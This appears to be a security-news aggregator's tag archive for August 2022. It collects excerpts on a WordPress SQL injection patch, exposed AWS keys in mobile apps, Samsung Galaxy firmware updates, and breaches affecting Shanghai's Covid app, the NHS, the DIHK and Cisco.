Tag Archive for: August

Extra, Extra, VERT Reads All About It: Cybersecurity News for the Week of August 29, 2022

/in


All of us at Tripwire’s Vulnerability Exposure and Research Team (VERT) are constantly looking out for interesting stories and developments in the infosec world. Here’s what cybersecurity news stood out to us during the week of August 29th, 2022. I’ve also included some comments on these stories.

WordPress 6.0.2 Patches Vulnerability That Could Impact Millions of Legacy Sites

The WordPress team this week announced the release of version 6.0.2 of the content management system (CMS), notes Security Week, with patches for three security bugs, including a high-severity SQL injection vulnerability.

AppSec/API Security 2022

“The content management system is subject to a SQL injection vulnerability. The issue exists in the WordPress Link functionality and usually affects older versions of WordPress. The functionality is disabled in newer versions of WordPress by default. The vulnerability exists because of improper sanitization of the limit argument of the link retrieval query in the get_bookmarks function. This vulnerability is patched in WordPress 6.0.2 and later.”

Over 1,000 iOS apps found exposing hardcoded AWS credentials

Security researchers are raising the alarm about mobile app developers relying on insecure practices that expose Amazon Web Services (AWS) credentials, making the supply chain vulnerable, Bleeping Computer reports.

“Both iOS and Android apps have exposed AWS credentials. With these credentials an attacker could gain access to databases or other services. It was estimated that 77% of the applications contained AWS tokens that could be used to access private cloud services. The security researchers noted that about 874 applications contained valid credentials that could be used to access database records that potentially contain sensitive personal information.”

Microsoft Discover Severe ‘One-Click’ Exploit for TikTok Android App

Microsoft on Wednesday disclosed details of a now-patched “high severity vulnerability” in the TikTok app for Android that could (Read more…)

Source…

Carrier-locked Galaxy S21 FE gets August 2022 security update in the US

/in


One week after the Galaxy S21, Galaxy S21+, and the Galaxy S21 Ultra, the Galaxy S21 FE has started getting the August 2022 security update. The new software is currently available for the carrier-locked version of the smartphone in the US.

The new update for the Galaxy S21 FE’s carrier-locked version comes with firmware version G990USQU3CVG1 in the US. It is available on T-Mobile’s network, and other carriers are expected to release the update soon. If you are a Galaxy S21 FE user in the US with a carrier-locked model, you can download the new software update by navigating to Settings » Software update and tapping on Download and install.

You can also download the appropriate firmware file from our firmware database and flash it manually. Before starting the manual flashing process, don’t forget to backup all your data.

What’s new with Galaxy S21 FE August 2022 security update?

The update brings the August 2022 security patch to fix dozens of security vulnerabilities, including the ones related to Samsung DeX, Samsung Knox, improper access control, and MAC address leak via Wi-Fi and Bluetooth. The update could also bring some general UI bug fixes and device stability improvements.

The Galaxy S21 FE was launched in early 2022, and it was the first Galaxy phone to run Android 12-based One UI 4 out of the box. Samsung said that it is eligible to receive at least three major Android OS updates in the future.

Image of Galaxy S21 FE

SamsungGalaxy S21 FE

Source…

Samsung Galaxy A33 5G gets August 2022 Android security patch

/in


Samsung has released a new software update for the Galaxy A33 5G that bumps up the Android security patch level on the smartphone to August 2022.

It’s currently seeding in Vietnam, Hong Kong, and South Korea with firmware versions A336EDXU3AVH1, A3360ZHU3AVGA, and A336NKSU1AVH1, respectively. However, the rollout should expand to other regions soon.


Samsung Galaxy A33 5G
Samsung Galaxy A33 5G

Samsung Galaxy A33 5G

If you live in any of these countries and haven’t received the update yet, you can check for it manually by heading to your Galaxy A33 5G’s Settings > Software update menu.

Via

Source…

Cybersecurity News Round-Up: Week of August 8, 2022

/in


Welcome back to our blog! It’s been yet another fascinating week in cybersecurity. 

We begin in China, where a hacker has claimed to have stolen the personal information of nearly 49 million users of Shanghai’s Covid app. In a post on Wednesday to Breach Forums, a hacker with the alias “XJP” stated “This DB (database) contains everyone who lives in or visited Shanghai since Suishenma’s adoption,” and provided a sample of the data including the phone numbers, names and Chinese identification numbers and health code status of 47 people. Reuters contacted eleven of the 47 people. Only two said their identification numbers were wrong.

In the UK, the National Health System has been dealing with a serious security incident after an attack last Thursday against a key service provider. According to The Guardian “at least nine NHS mental health trusts have been affected by the outage, reducing their access to patients’ records.” The story goes on to say that “The cyber-attack targeted systems used to refer patients for care, including ambulances being dispatched, out-of-hours appointment bookings, triage, out-of-hours care, emergency prescriptions and safety alerts. It also targeted the finance system used by the trust.” 

Also in Europe, a massive attack hit the website of the German Chambers of Industry and Commerce (DIHK) forcing the organization to shut down its IT systems as a precautionary measure for security reasons. As of earlier this week, the DIHK said it was only relying on phone and fax for communications. Michael Bergmann, chief executive of DIHK, defined the attack as serious and massive, it also added that the organization was not able to estimate how long its systems will be down.

On Wednesday, networking giant Cisco released details about a breach that occurred in May. While the cybercriminals responsible for the May 24th incident stole some information, the company says the business wasn’t impacted. According to Dark Reading “[W]e took immediate action to contain and eradicate the bad actors, remediate the impact of the incident, and further harden our IT environment,” a company spokesman said in the statement sent to Dark Reading….

Source…